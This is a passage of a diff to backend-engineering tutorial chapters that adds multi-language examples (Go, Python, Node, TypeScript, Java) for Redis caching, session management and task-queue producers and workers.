+// Usage: wrap any expensive call. Only runs the DB query on a miss.
+getProduct := Cached(rdb, "product:42", time.Hour,
+    func(ctx context.Context) (Product, error) {
+        return fetchFromDB(ctx, "42")
+    })
+
+// TTL-based API response caching (e.g. weather) is the SAME wrapper with
+// a different key: weather doesn't change every minute, and the upstream
+// API is rate limited and charges per call.
+getWeather := Cached(rdb, "weather:pune", time.Hour, callWeatherAPI)
+```
 
 ```python title="cache.py / Python + redis-py + FastAPI"
 import json
@@ -761,7 +1200,208 @@ async def get_weather(city: str):
     return {"source": "api", "data": weather_data}
 ```
 
-### 10.4: Session Management with Redis (Python)
+```js title="cacheResult.js / Node 20+ + node-redis + Express"
+// JavaScript's decorators aren't in plain Node yet, so the wrapper is a
+// higher-order function: pass a function in, get a cached one back.
+function cacheResult(fn, ttl = 3600) {
+  return async (...args) => {
+    // Build cache key from function name + args
+    const cacheKey = `${fn.name}:${JSON.stringify(args)}`
+
+    // Step 1: Check cache (Cache Hit)
+    const cached = await redis.get(cacheKey)
+    if (cached !== null) {
+      console.log(`[CACHE HIT] ${cacheKey}`)
+      return JSON.parse(cached)
+    }
+
+    // Step 2: Cache Miss, execute the actual function
+    console.log(`[CACHE MISS] calling ${fn.name}...`)
+    const result = await fn(...args)
+
+    // Step 3: Store in Redis with TTL
+    await redis.set(cacheKey, JSON.stringify(result), { EX: ttl })
+
+    return result
+  }
+}
+
+// Usage: wrap the expensive call, not the route. The handler never
+// learns that a cache exists, which is the whole point.
+const getProduct = cacheResult(fetchFromDb, 3600) // cache for 1 hour
+
+app.get('/products/:id', async (req, res) => {
+  res.json(await getProduct(req.params.id))
+})
+
+// TTL-based API Response Caching (e.g. weather)
+app.get('/weather/:city', async (req, res) => {
+  const cacheKey = `weather:${req.params.city}`
+
+  // Check cache (TTL = 1 hour, weather doesn't change every minute)
+  const cached = await redis.get(cacheKey)
+  if (cached !== null) {
+    return res.json({ source: 'cache', data: JSON.parse(cached) })
+  }
+
+  // Miss: call external weather API (costs money / rate limited)
+  const weatherData = await callWeatherApi(req.params.city)
+
+  // Store for 1 hour
+  await redis.set(cacheKey, JSON.stringify(weatherData), { EX: 3600 })
+
+  res.json({ source: 'api', data: weatherData })
+})
+```
+
+```ts title="cacheResult.ts / TypeScript 5+ + node-redis"
+// The two generics are the point of the TypeScript version: the wrapper
+// hands back a function with the SAME signature it was given. Adding a
+// cache to a call site therefore changes nothing about how it is called,
+// and if it did, the build would break rather than production.
+function cacheResult<A extends unknown[], R>(
+  fn: (...args: A) => Promise<R>,
+  ttl = 3600,
+): (...args: A) => Promise<R> {
+  return async (...args: A): Promise<R> => {
+    // Build cache key from function name + args
+    const cacheKey = `${fn.name}:${JSON.stringify(args)}`
+
+    // Step 1: Check cache (Cache Hit)
+    const cached = await redis.get(cacheKey)
+    if (cached !== null) {
+      console.log(`[CACHE HIT] ${cacheKey}`)
+      return JSON.parse(cached) as R
+    }
+
+    // Step 2: Cache Miss, execute the actual function
+    console.log(`[CACHE MISS] calling ${fn.name}...`)
+    const result = await fn(...args)
+
+    // Step 3: Store in Redis with TTL
+    await redis.set(cacheKey, JSON.stringify(result), { EX: ttl })
+
+    return result
+  }
+}
+
+// Usage: still (id: string) => Promise<Product>, cache or no cache.
+const getProduct: (id: string) => Promise<Product> = cacheResult(fetchFromDb, 3600)
+
+// TTL-based API response caching (e.g. weather), same wrapper, different
+// upstream: the external API costs money and is rate limited.
+const getWeather: (city: string) => Promise<WeatherData> = cacheResult(callWeatherApi, 3600)
+```
+
+```java title="ProductService.java / Java 17+ + Spring Cache + Redis"
+// Java's answer to Python's decorator is an annotation plus a proxy, and
+// Spring ships it: @Cacheable IS cache-aside. All three steps still
+// happen, they just happen in the proxy instead of in your method body.
+@Configuration
+@EnableCaching
+class CacheConfig {
+    @Bean
+    RedisCacheManager cacheManager(RedisConnectionFactory cf) {
+        return RedisCacheManager.builder(cf)
+            .cacheDefaults(RedisCacheConfiguration.defaultCacheConfig()
+                .entryTtl(Duration.ofHours(1))) // the TTL, as in SETEX
+            .build();
+    }
+}
+
+@Service
+public class ProductService {
+
+    // Step 1 check Redis, step 2 run this body only on a miss, step 3
+    // store what it returned under "product::<id>". You write none of it.
+    @Cacheable(cacheNames = "product", key = "#productId")
+    public Product getProduct(String productId) {
+        // Expensive DB query, only runs on cache miss
+        return db.findById(productId).orElseThrow();
+    }
+
+    // TTL-based API response caching (e.g. weather). Same annotation, a
+    // different upstream: the external API is rate limited and paid-per-call.
+    @Cacheable(cacheNames = "weather", key = "#city")
+    public WeatherData getWeather(String city) {
+        return weatherApi.fetch(city);
+    }
+
+    // Write-through, the cache is updated instead of skipped, so the next
+    // read gets the new value rather than a stale one.
+    @CachePut(cacheNames = "product", key = "#product.id()")
+    public Product updateProduct(Product product) {
+        return db.save(product);
+    }
+}
+
+// The catch worth knowing: this runs through a proxy, so calling
+// getProduct() from another method of THIS class bypasses the cache
+// entirely and hits the database on every single call.
+```
+
+### 10.4: Session Management with Redis
+
+Go Python JavaScript TypeScript Java
+
+create on login, validate on every request, delete on logout
+
+```go title="session.go / Go + go-redis"
+const sessionTTL = 24 * time.Hour
+
+// CreateSession stores a session after successful login.
+func CreateSession(ctx context.Context, userID string,
+    userData map[string]any) (string, error) {
+
+    sessionID := uuid.NewString()
+    sessionKey := "session:" + sessionID
+
+    payload := map[string]any{"user_id": userID}
+    for k, v := range userData {
+        payload[k] = v
+    }
+
+    data, err := json.Marshal(payload)
+    if err != nil {
+        return "", err
+    }
+
+    // Store session data with 24-hour TTL.
+    // TTL ensures sessions auto-expire, no manual cleanup needed.
+    if err := rdb.Set(ctx, sessionKey, data, sessionTTL).Err(); err != nil {
+        return "", err
+    }
+
+    return sessionID, nil // returned to client as cookie/token
+}
+
+// GetSession validates the session on every authenticated API request.
+// Redis O(1) lookup, microseconds, not milliseconds.
+func GetSession(ctx context.Context, sessionID string) (map[string]any, error) {
+    sessionKey := "session:" + sessionID
+
+    data, err := rdb.Get(ctx, sessionKey).Result()
+    if errors.Is(err, redis.Nil) {
+        return nil, nil // session expired or invalid
+    } else if err != nil {
+        return nil, err
+    }
+
+    // Optionally: refresh TTL on activity (sliding window)
+    rdb.Expire(ctx, sessionKey, sessionTTL)
+
+    var session map[string]any
+    if err := json.Unmarshal([]byte(data), &session); err != nil {
+        return nil, err
+    }
+    return session, nil
+}
+
+// DeleteSession logs the user out, removing the session immediately.
+func DeleteSession(ctx context.Context, sessionID string) error {
+    return rdb.Del(ctx, "session:"+sessionID).Err()
+}
+```
 
 ```python title="session.py / Python + redis-py"
 import uuid
@@ -807,6 +1447,159 @@ def delete_session(session_id: str):
     r.delete(f"session:{session_id}")
 ```
 
+```js title="session.js / Node 20+ + node-redis"
+import { randomUUID } from 'node:crypto'
+
+const SESSION_TTL = 60 * 60 * 24 // 24 hours, in seconds
+
+// Create a session after successful login. Store in Redis.
+export async function createSession(userId, userData) {
+  const sessionId = randomUUID()
+
+  // Store session data with 24-hour TTL.
+  // TTL ensures sessions auto-expire, no manual cleanup needed.
+  await redis.set(
+    `session:${sessionId}`,
+    JSON.stringify({ user_id: userId, ...userData }),
+    { EX: SESSION_TTL },
+  )
+
+  return sessionId // returned to client as cookie/token
+}
+
+// Validate session on every authenticated API request.
+// Redis O(1) lookup, microseconds, not milliseconds.
+export async function getSession(sessionId) {
+  const sessionKey = `session:${sessionId}`
+  const data = await redis.get(sessionKey)
+
+  if (data === null) {
+    return null // session expired or invalid
+  }
+
+  // Optionally: refresh TTL on activity (sliding window)
+  await redis.expire(sessionKey, SESSION_TTL)
+
+  return JSON.parse(data)
+}
+
+// Logout, delete session from Redis immediately.
+export async function deleteSession(sessionId) {
+  await redis.del(`session:${sessionId}`)
+}
+```
+
+```ts title="session.ts / TypeScript 5+ + node-redis"
+import { randomUUID } from 'node:crypto'
+
+const SESSION_TTL = 60 * 60 * 24 // 24 hours, in seconds
+
+export interface Session {
+  user_id: string
+  email: string
+  role: string
+}
+
+// `Omit<Session, 'user_id'>` says the caller supplies everything EXCEPT
+// the id, which this function owns. A login handler cannot accidentally
+// pass a user_id from the request body.
+export async function createSession(
+  userId: string,
+  userData: Omit<Session, 'user_id'>,
+): Promise<string> {
+  const sessionId = randomUUID()
+  const session: Session = { user_id: userId, ...userData }
+
+  // Store session data with 24-hour TTL.
+  // TTL ensures sessions auto-expire, no manual cleanup needed.
+  await redis.set(`session:${sessionId}`, JSON.stringify(session), { EX: SESSION_TTL })
+
+  return sessionId // returned to client as cookie/token
+}
+
+// The `| null` in the return type is the part that earns its keep: every
+// caller is forced to handle "expired or invalid" before it can read
+// user_id, and that is exactly the check an auth middleware must not skip.
+export async function getSession(sessionId: string): Promise<Session | null> {
+  const sessionKey = `session:${sessionId}`
+  const data = await redis.get(sessionKey)
+
+  if (data === null) {
+    return null // session expired or invalid
+  }
+
+  // Optionally: refresh TTL on activity (sliding window)
+  await redis.expire(sessionKey, SESSION_TTL)
+
+  return JSON.parse(data) as Session
+}
+
+// Logout, delete session from Redis immediately.
+export async function deleteSession(sessionId: string): Promise<void> {
+  await redis.del(`session:${sessionId}`)
+}
+```
+
+```java title="SessionService.java / Java 17+ + Spring Data Redis"
+@Service
+public class SessionService {
+    private static final Duration SESSION_TTL = Duration.ofHours(24);
+
+    private final StringRedisTemplate redis;
+    private final ObjectMapper json;
+
+    SessionService(StringRedisTemplate redis, ObjectMapper json) {
+        this.redis = redis;
+        this.json = json;
+    }
+
+    /** Create a session after successful login. Store in Redis. */
+    public String createSession(String userId, Map<String, Object> userData)
+            throws JsonProcessingException {
+        String sessionId = UUID.randomUUID().toString();
+
+        Map<String, Object> payload = new HashMap<>(userData);
+        payload.put("user_id", userId);
+
+        // Store session data with 24-hour TTL.
+        // TTL ensures sessions auto-expire, no manual cleanup needed.
+        redis.opsForValue().set("session:" + sessionId,
+            json.writeValueAsString(payload), SESSION_TTL);
+
+        return sessionId; // returned to client as cookie/token
+    }
+
+    /**
+     * Validate session on every authenticated API request.
+     * Redis O(1) lookup, microseconds, not milliseconds.
+     */
+    public Optional<Map<String, Object>> getSession(String sessionId)
+            throws JsonProcessingException {
+        String sessionKey = "session:" + sessionId;
+        String data = redis.opsForValue().get(sessionKey);
+
+        if (data == null) {
+            return Optional.empty(); // session expired or invalid
+        }
+
+        // Optionally: refresh TTL on activity (sliding window)
+        redis.expire(sessionKey, SESSION_TTL);
+
+        return Optional.of(json.readValue(data, new TypeReference<Map<String, Object>>() {}));
+    }
+
+    /** Logout, delete session from Redis immediately. */
+    public void deleteSession(String sessionId) {
+        redis.delete("session:" + sessionId);
+    }
+}
+
+// Spring Session does the whole of the above for you: add
+// spring-session-data-redis and @EnableRedisHttpSession, and the ordinary
+// servlet HttpSession is backed by Redis with a TTL, with no session code
+// of your own at all. Worth writing it by hand once, then reaching for that.
+```
+
 ## Further Reading & Documentation
 
 #### Redis Official Docs
@@ -840,6 +1633,6 @@ def delete_session(session_id: str):
 </Callout>
 
 BACKEND ENGINEERING FIELD MANUAL / V2 / CHAPTER 12 / CACHING\
-Notes compiled from lecture transcript / Go + Python examples / MDN & Redis references inline
+Notes compiled from lecture transcript / Go, Python, JavaScript, TypeScript & Java examples / MDN & Redis references inline
 
-Backend from First Principles / Chapter 09 / Caching. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 09 / Caching. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot).

--- a/src/content/chapters/10-task-queues-and-background-jobs.mdx
+++ b/src/content/chapters/10-task-queues-and-background-jobs.mdx
@@ -2,7 +2,7 @@
 order: 10
 title: "Task Queues & Background Jobs"
 navTitle: "Task Queues & Background Jobs"
-summary: "Chapter 10 of Backend from First Principles: Task Queues & Background Jobs."
+summary: "Why slow work belongs outside the request, and how a task queue moves it there: brokers, producers and consumers, retries and backoff, visibility timeouts, idempotency, worker rate limiting, monitoring, and workflow engines. Worked implementations in Go, Python, JavaScript, TypeScript and Java."
 readingTime: "3-4 hours"
 keywords:
   - "task"
@@ -140,7 +140,6 @@ Because tasks cross process boundaries, all data must be serialized. JSON is the
   "token": "eyJhbGci...",
   "created_at": "2024-01-15T10:30:00Z"
 }
-JSON
 ```
 
 Python
@@ -151,9 +150,17 @@ JavaScript
 
 Deserializes to an `object`
 
+TypeScript
+
+Deserializes to an `object`, typed by the interface the producer and worker share
+
 Go
 
 Deserializes to a `struct` (via `json.Unmarshal`)
+
+Java
+
+Deserializes to a `record` or POJO (via Jackson's `readValue`)
 
 05
 
@@ -294,7 +301,7 @@ Amazon SQS is AWS's fully managed message queuing service. No servers to manage,
 
 SQS implements visibility timeout natively. When a worker calls `ReceiveMessage`, the message becomes invisible to all other consumers for the configured timeout (default 30s, max 12 hours). The worker must call `DeleteMessage` on success, or do nothing to let it become visible again for retry.
 
-```go
+```go title="sqs.go / Go + AWS SDK v2"
 // Go, SQS producer + consumer using AWS SDK v2
 package main
 
@@ -340,7 +347,6 @@ func PollQueue(ctx context.Context, client *sqs.Client, queueURL string) {
         }
     }
 }
-Go / AWS SDK v2
 ```
 
 <Callout type="info" title="Standard Queue + Idempotency">
@@ -476,72 +482,19 @@ Same reason as email, depends on Apple/Google external services. Rate-limited. N
 
 11
 
-## Code Examples: Go & Python
+## Code Examples
 
-### Python: Celery + Redis
+The libraries below are the de-facto choice in each ecosystem, and all five sit on Redis: [Celery](https://docs.celeryq.dev/) in Python, [Asynq](https://github.com/hibiken/asynq) in Go, [BullMQ](https://docs.bullmq.io/) in Node, and Spring Data Redis Streams in Java. They look different on the surface, and underneath they are doing the same three things: put a JSON payload in Redis, take it out in a worker process, acknowledge it when the work is done.
 
-[Celery](https://docs.celeryq.dev/) is the most popular Python task queue. Uses Redis (or RabbitMQ) as the broker.
+### The consumer: defining and handling the task
 
-```python
-# tasks.py, Define the task (consumer side)
-from celery import Celery
-import resend
+This is the code that runs in the **worker** process, not in your API. Note what every version does with errors, because it is the whole retry story: a payload that will never parse is a permanent failure and must not be retried, while a provider that timed out should be.
 
-# Connect Celery to Redis broker
-app = Celery('tasks', broker='redis://localhost:6379/0')
+Go Python JavaScript TypeScript Java
 
-# Decorate the function as a Celery task
-@app.task(bind=True, max_retries=5, default_retry_delay=60)
-def send_verification_email(self, user_id: str, email: str, token: str):
-    """
-    Called by the worker process.
-    self.retry() implements exponential backoff automatically.
-    """
-    try:
-        params = {
-            "from": "noreply@myapp.com",
-            "to": [email],
-            "subject": "Verify your email",
-            "html": build_email_template(token),
-        }
-        resend.Emails.send(params)
-    except Exception as exc:
-        # Exponential backoff: 60s, 120s, 240s, 480s, 960s
-        countdown = 60 * (2 ** self.request.retries)
-        raise self.retry(exc=exc, countdown=countdown)
-Python
-```
+the task payload and the function that processes it
 
-```python
-# signup.py, Producer side (inside your API handler)
-from fastapi import FastAPI
-from tasks import send_verification_email
-
-app = FastAPI()
-
-@app.post("/signup")
-async def signup(body: SignupRequest):
-    # 1. Validate, hash password, save user to DB
-    user = await create_user(body)
-    token = generate_verification_token(user.id)
-
-    # 2. Enqueue, returns instantly, does NOT wait for email
-    send_verification_email.delay(
-        user_id=user.id,
-        email=user.email,
-        token=token
-    )
-
-    # 3. Return 201 immediately
-    return {"message": "Account created. Check your email."}, 201
-Python / FastAPI
-```
-
-### Go: Asynq + Redis
-
-[Asynq](https://github.com/hibiken/asynq) is a simple, reliable distributed task queue library for Go, backed by Redis Streams.
-
-```go
+```go title="tasks/email.go + handlers/email_handler.go / Go + Asynq"
 // tasks/email.go, Task definitions (producer + payload)
 package tasks
 
@@ -570,21 +523,9 @@ func NewSendVerificationEmailTask(userID, email, token string) (*asynq.Task, err
     // asynq.MaxRetry, after 5 failures, moves to dead letter
     return asynq.NewTask(TypeSendVerificationEmail, payload, asynq.MaxRetry(5)), nil
 }
-Go
-```
 
-```go
 // handlers/email_handler.go, Consumer handler
 package handlers
-
-import (
-    "context"
-    "encoding/json"
-    "fmt"
-    "log/slog"
-    tasks "myapp/tasks"
-    "github.com/hibiken/asynq"
-)
 
 type EmailHandler struct {
     emailSvc EmailService // injected dependency
@@ -612,55 +553,457 @@ func (h *EmailHandler) HandleSendVerificationEmail(
     // 3. Returning nil -> ACK to queue (task done)
     return nil
 }
-Go
 ```
 
-```go
-// main.go, Wire producer and start worker server
-package main
+```python title="tasks.py / Python + Celery"
+# tasks.py, Define the task (consumer side)
+from celery import Celery
+import resend
 
-import (
-    "github.com/hibiken/asynq"
-    "myapp/handlers"
-    "myapp/tasks"
-)
+# Connect Celery to Redis broker
+app = Celery('tasks', broker='redis://localhost:6379/0')
 
-func main() {
-    redisOpt := asynq.RedisClientOpt{Addr: "localhost:6379"}
+# Decorate the function as a Celery task
+@app.task(bind=True, max_retries=5, default_retry_delay=60)
+def send_verification_email(self, user_id: str, email: str, token: str):
+    """
+    Called by the worker process.
+    self.retry() implements exponential backoff automatically.
+    """
+    try:
+        params = {
+            "from": "noreply@myapp.com",
+            "to": [email],
+            "subject": "Verify your email",
+            "html": build_email_template(token),
+        }
+        resend.Emails.send(params)
+    except Exception as exc:
+        # Exponential backoff: 60s, 120s, 240s, 480s, 960s
+        countdown = 60 * (2 ** self.request.retries)
+        raise self.retry(exc=exc, countdown=countdown)
+```
 
-    // -- PRODUCER -------------------------------------
-    client := asynq.NewClient(redisOpt)
-    defer client.Close()
+```js title="worker.js / Node 20+ + BullMQ"
+// worker.js, Consumer, BullMQ calls this for each job
+import { Worker } from 'bullmq'
+import { Resend } from 'resend'
 
-    task, _ := tasks.NewSendVerificationEmailTask(
-        "usr_01J2K", "alice@example.com", "eyJhbGci...",
-    )
-    // Enqueue, returns immediately
-    info, _ := client.Enqueue(task)
-    // info.ID, info.Queue, info.State can be used for monitoring
+const connection = { host: 'localhost', port: 6379 }
+const resend = new Resend(process.env.RESEND_API_KEY)
 
-    // -- CONSUMER (worker server) ---------------------
-    srv := asynq.NewServer(redisOpt, asynq.Config{
-        Concurrency: 10, // 10 concurrent workers
-        Queues: map[string]int{
-            "email":    6, // higher priority
-            "default":  3,
-            "low":      1,
-        },
+// The queue NAME is the contract between producer and consumer; both
+// sides must spell it the same way. That is BullMQ's version of Asynq's
+// task type constant.
+export const worker = new Worker(
+  'email',
+  async (job) => {
+    // 1. The payload is already a JS object; BullMQ serialized it for us
+    const { userId, email, token } = job.data
+
+    // 2. Execute: call email provider API
+    console.log('sending verification email', userId, email)
+    await resend.emails.send({
+      from: 'noreply@myapp.com',
+      to: [email],
+      subject: 'Verify your email',
+      html: buildEmailTemplate(token),
     })
 
-    mux := asynq.NewServeMux()
-    mux.HandleFunc(tasks.TypeSendVerificationEmail,
-        handlers.EmailHandler{}.HandleSendVerificationEmail)
+    // 3. Returning normally ACKs the job (task done). THROWING is what
+    //    triggers a retry, so never swallow an error in here: a caught
+    //    exception looks exactly like success to the queue.
+  },
+  { connection, concurrency: 10 },
+)
 
-    srv.Run(mux)
-}
-Go
+worker.on('failed', (job, err) => {
+  console.error(`job ${job?.id} failed (attempt ${job?.attemptsMade})`, err)
+})
 ```
 
-### Go: Recurring Task with Asynq Scheduler
+```ts title="worker.ts / TypeScript 5+ + BullMQ"
+import { Worker, UnrecoverableError, type Job } from 'bullmq'
 
-```go
+// One exported type, imported by BOTH the producer and this worker. It is
+// the cheapest fix for the single most common task-queue bug: a producer
+// that starts sending a renamed field while the worker still reads the
+// old one. Here that mismatch is a compile error, not a 3am page.
+export interface EmailJob {
+  userId: string
+  email: string
+  token: string
+}
+
+export const worker = new Worker<EmailJob>(
+  'email',
+  async (job: Job<EmailJob>) => {
+    const { userId, email, token } = job.data
+
+    if (typeof email !== 'string') {
+      // Non-retryable: no amount of retrying fixes a malformed payload.
+      // UnrecoverableError is BullMQ's asynq.SkipRetry.
+      throw new UnrecoverableError('malformed payload: email missing')
+    }
+
+    console.log('sending verification email', userId, email)
+    await resend.emails.send({
+      from: 'noreply@myapp.com',
+      to: [email],
+      subject: 'Verify your email',
+      html: buildEmailTemplate(token),
+    })
+    // Returning normally ACKs; throwing anything else triggers a retry.
+  },
+  { connection, concurrency: 10 },
+)
+```
+
+```java title="EmailTaskHandler.java / Java 17+ + Spring Data Redis Streams"
+// Java has no single dominant task queue, so this is the mechanism itself:
+// a Redis Stream with a consumer group, which is exactly what Asynq builds
+// on. Section 6 of this chapter describes the XADD/XREADGROUP/XACK cycle
+// you are about to see in code.
+public record EmailPayload(String userId, String email, String token) {}
+
+@Component
+public class EmailTaskHandler
+        implements StreamListener<String, MapRecord<String, String, String>> {
+
+    static final String STREAM = "tasks:email";
+    static final String GROUP = "email-workers";
+    static final String DLQ = "tasks:email:dead";
+
+    private final StringRedisTemplate redis;
+    private final ObjectMapper json;
+    private final EmailService emailSvc; // injected dependency
+
+    EmailTaskHandler(StringRedisTemplate redis, ObjectMapper json, EmailService emailSvc) {
+        this.redis = redis;
+        this.json = json;
+        this.emailSvc = emailSvc;
+    }
+
+    @Override
+    public void onMessage(MapRecord<String, String, String> record) {
+        EmailPayload p;
+
+        // 1. Deserialize JSON -> Java record
+        try {
+            p = json.readValue(record.getValue().get("payload"), EmailPayload.class);
+        } catch (JsonProcessingException e) {
+            // Non-retryable: this payload will never parse. ACK it so it
+            // stops being redelivered, and park it in the dead letter stream.
+            redis.opsForStream().add(DLQ, record.getValue());
+            redis.opsForStream().acknowledge(STREAM, GROUP, record.getId());
+            return;
+        }
+
+        // 2. Execute: call email provider API
+        try {
+            log.info("sending verification email user_id={} email={}", p.userId(), p.email());
+            emailSvc.sendVerification(p.email(), p.token());
+        } catch (RuntimeException e) {
+            // Retryable: deliberately do NOT acknowledge. The message stays
+            // in the group's pending list and another worker reclaims it
+            // via XAUTOCLAIM once the idle timeout passes.
+            log.warn("send failed; leaving unacked for redelivery", e);
+            return;
+        }
+
+        // 3. XACK -> the task is done and leaves the pending list
+        redis.opsForStream().acknowledge(STREAM, GROUP, record.getId());
+    }
+}
+```
+
+### The producer: enqueue from your API handler
+
+This half runs inside the **HTTP request**, and the only thing that matters about it is that it returns in microseconds. Every version below hands a JSON payload to Redis and immediately moves on to sending the response.
+
+Go Python JavaScript TypeScript Java
+
+enqueue and return 201 without waiting for the email
+
+```go title="main.go / Go + Asynq, producer half"
+redisOpt := asynq.RedisClientOpt{Addr: "localhost:6379"}
+
+client := asynq.NewClient(redisOpt)
+defer client.Close()
+
+task, _ := tasks.NewSendVerificationEmailTask(
+    "usr_01J2K", "alice@example.com", "eyJhbGci...",
+)
+
+// Enqueue, returns immediately
+info, _ := client.Enqueue(task)
+// info.ID, info.Queue, info.State can be used for monitoring
+```
+
+```python title="signup.py / Python + Celery + FastAPI"
+# signup.py, Producer side (inside your API handler)
+from fastapi import FastAPI
+from tasks import send_verification_email
+
+app = FastAPI()
+
+@app.post("/signup")
+async def signup(body: SignupRequest):
+    # 1. Validate, hash password, save user to DB
+    user = await create_user(body)
+    token = generate_verification_token(user.id)
+
+    # 2. Enqueue, returns instantly, does NOT wait for email
+    send_verification_email.delay(
+        user_id=user.id,
+        email=user.email,
+        token=token
+    )
+
+    # 3. Return 201 immediately
+    return {"message": "Account created. Check your email."}, 201
+```
+
+```js title="signup.js / Node 20+ + BullMQ + Express"
+// signup.js, Producer side (inside your API handler)
+import { Queue } from 'bullmq'
+
+// Same queue name the worker listens on
+const emailQueue = new Queue('email', { connection: { host: 'localhost', port: 6379 } })
+
+app.post('/signup', async (req, res) => {
+  // 1. Validate, hash password, save user to DB
+  const user = await createUser(req.body)
+  const token = generateVerificationToken(user.id)
+
+  // 2. Enqueue, returns instantly, does NOT wait for email
+  await emailQueue.add(
+    'send_verification',
+    { userId: user.id, email: user.email, token },
+    { attempts: 5, backoff: { type: 'exponential', delay: 60_000 } },
+  )
+
+  // 3. Return 201 immediately
+  res.status(201).json({ message: 'Account created. Check your email.' })
+})
+```
+
+```ts title="signup.ts / TypeScript 5+ + BullMQ + Express"
+import { Queue } from 'bullmq'
+import type { Request, Response } from 'express'
+import type { EmailJob } from './worker'
+
+// The SAME EmailJob the worker imports. `add` now refuses a payload the
+// worker cannot read, which is the entire point of importing it here.
+const emailQueue = new Queue<EmailJob>('email', {
+  connection: { host: 'localhost', port: 6379 },
+})
+
+export async function signup(req: Request, res: Response): Promise<void> {
+  // 1. Validate, hash password, save user to DB
+  const user = await createUser(req.body)
+  const token = generateVerificationToken(user.id)
+
+  // 2. Enqueue, returns instantly, does NOT wait for email
+  await emailQueue.add(
+    'send_verification',
+    { userId: user.id, email: user.email, token },
+    {
+      attempts: 5,
+      backoff: { type: 'exponential', delay: 60_000 }, // 60s, 120s, 240s...
+      removeOnComplete: 1_000, // keep the last 1k, not every job forever
+    },
+  )
+
+  // 3. Return 201 immediately
+  res.status(201).json({ message: 'Account created. Check your email.' })
+}
+```
+
+```java title="SignupController.java / Java 17+ + Spring Data Redis Streams"
+@Service
+class EmailTaskProducer {
+    private final StringRedisTemplate redis;
+    private final ObjectMapper json;
+
+    EmailTaskProducer(StringRedisTemplate redis, ObjectMapper json) {
+        this.redis = redis;
+        this.json = json;
+    }
+
+    String enqueue(EmailPayload payload) throws JsonProcessingException {
+        // XADD tasks:email * payload <json>, returns immediately
+        RecordId id = redis.opsForStream().add(StreamRecords.newRecord()
+            .in(EmailTaskHandler.STREAM)
+            .ofMap(Map.of("payload", json.writeValueAsString(payload))));
+        return id.getValue(); // the task id, usable for monitoring
+    }
+}
+
+@RestController
+class SignupController {
+
+    @PostMapping("/signup")
+    @ResponseStatus(HttpStatus.CREATED) // 3. Return 201 immediately
+    Map<String, String> signup(@RequestBody SignupRequest body) throws JsonProcessingException {
+        // 1. Validate, hash password, save user to DB
+        User user = createUser(body);
+        String token = generateVerificationToken(user.id());
+
+        // 2. Enqueue, returns instantly, does NOT wait for email
+        producer.enqueue(new EmailPayload(user.id(), user.email(), token));
+
+        return Map.of("message", "Account created. Check your email.");
+    }
+}
+```
+
+### Running the worker: concurrency and priority queues
+
+The worker is a **separate process** from your API, and that separation is the point: you scale it independently, restart it independently, and a slow email never occupies a web thread. Two knobs matter, how many tasks run at once, and which queue gets drained first when work piles up.
+
+Go Python JavaScript TypeScript Java
+
+the long-running process that drains the queue
+
+```go title="main.go / Go + Asynq, worker half"
+srv := asynq.NewServer(redisOpt, asynq.Config{
+    Concurrency: 10, // 10 concurrent workers
+    Queues: map[string]int{
+        "email":    6, // higher priority
+        "default":  3,
+        "low":      1,
+    },
+})
+
+mux := asynq.NewServeMux()
+mux.HandleFunc(tasks.TypeSendVerificationEmail,
+    handlers.EmailHandler{}.HandleSendVerificationEmail)
+
+srv.Run(mux) // blocks; this process IS the worker
+```
+
+```python title="worker / Python + Celery CLI"
+# Celery's worker is a command, not code you write. The same tasks.py is
+# imported by both your API (to enqueue) and this process (to execute).
+#
+#   celery -A tasks worker \
+#       --concurrency=10 \
+#       --queues=email,default,low \
+#       --loglevel=info
+#
+# --concurrency defaults to the CPU count, which is the wrong default for
+# IO-bound work like sending email. See chapter 20.
+
+# Priority is expressed by ROUTING tasks to named queues:
+app.conf.task_routes = {
+    "tasks.send_verification_email": {"queue": "email"},
+    "tasks.generate_monthly_report": {"queue": "low"},
+}
+
+# Then run one worker per priority class, and give the important queue
+# more processes rather than trusting a single worker to interleave fairly:
+#   celery -A tasks worker --queues=email   --concurrency=6
+#   celery -A tasks worker --queues=default --concurrency=3
+#   celery -A tasks worker --queues=low     --concurrency=1
+```
+
+```js title="worker.js / Node 20+ + BullMQ, entry point"
+// This file is its own process: `node worker.js`, never imported by the API.
+import { Worker } from 'bullmq'
+
+const connection = { host: 'localhost', port: 6379 }
+
+// concurrency is how many jobs this ONE process runs at a time. Node is
+// single-threaded, so this is only a win for IO-bound work; for CPU-bound
+// tasks use several processes (or a Sandboxed Processor). See chapter 20.
+new Worker('email', emailProcessor, { connection, concurrency: 10 })
+new Worker('default', defaultProcessor, { connection, concurrency: 3 })
+new Worker('low', lowProcessor, { connection, concurrency: 1 })
+
+// Graceful shutdown: stop accepting new jobs, let in-flight ones finish.
+// Without this, a deploy kills jobs mid-send and they are redelivered,
+// which is exactly why handlers must be idempotent. See chapter 16.
+process.on('SIGTERM', async () => {
+  await Promise.all([emailWorker.close(), defaultWorker.close(), lowWorker.close()])
+  process.exit(0)
+})
+```
+
+```ts title="worker.ts / TypeScript 5+ + BullMQ, entry point"
+import { Worker } from 'bullmq'
+import type { EmailJob } from './types'
+
+const connection = { host: 'localhost', port: 6379 }
+
+// BullMQ has no cross-queue priority setting: a Worker drains exactly one
+// queue. Priority is therefore a RESOURCE decision, you give the queue
+// that matters more concurrency, and run it in more replicas.
+const workers = [
+  new Worker<EmailJob>('email', emailProcessor, { connection, concurrency: 10 }),
+  new Worker('default', defaultProcessor, { connection, concurrency: 3 }),
+  new Worker('low', lowProcessor, { connection, concurrency: 1 }),
+]
+
+process.on('SIGTERM', async () => {
+  // close() waits for in-flight jobs; a hard kill would let them be
+  // redelivered, which only a genuinely idempotent handler survives.
+  await Promise.all(workers.map((w) => w.close()))
+  process.exit(0)
+})
+```
+
+```java title="WorkerConfig.java / Java 17+ + Spring Data Redis Streams"
+@Configuration
+public class WorkerConfig {
+
+    @Bean
+    StreamMessageListenerContainer<String, MapRecord<String, String, String>> emailWorker(
+            RedisConnectionFactory cf, EmailTaskHandler handler) {
+
+        var options = StreamMessageListenerContainer
+            .StreamMessageListenerContainerOptions.builder()
+            .pollTimeout(Duration.ofSeconds(2))
+            // The thread pool IS the concurrency knob: 10 tasks at a time.
+            .executor(Executors.newFixedThreadPool(10))
+            .build();
+
+        var container = StreamMessageListenerContainer.create(cf, options);
+
+        // Reading as a CONSUMER GROUP is what makes this a work queue
+        // rather than a broadcast: each message goes to exactly ONE
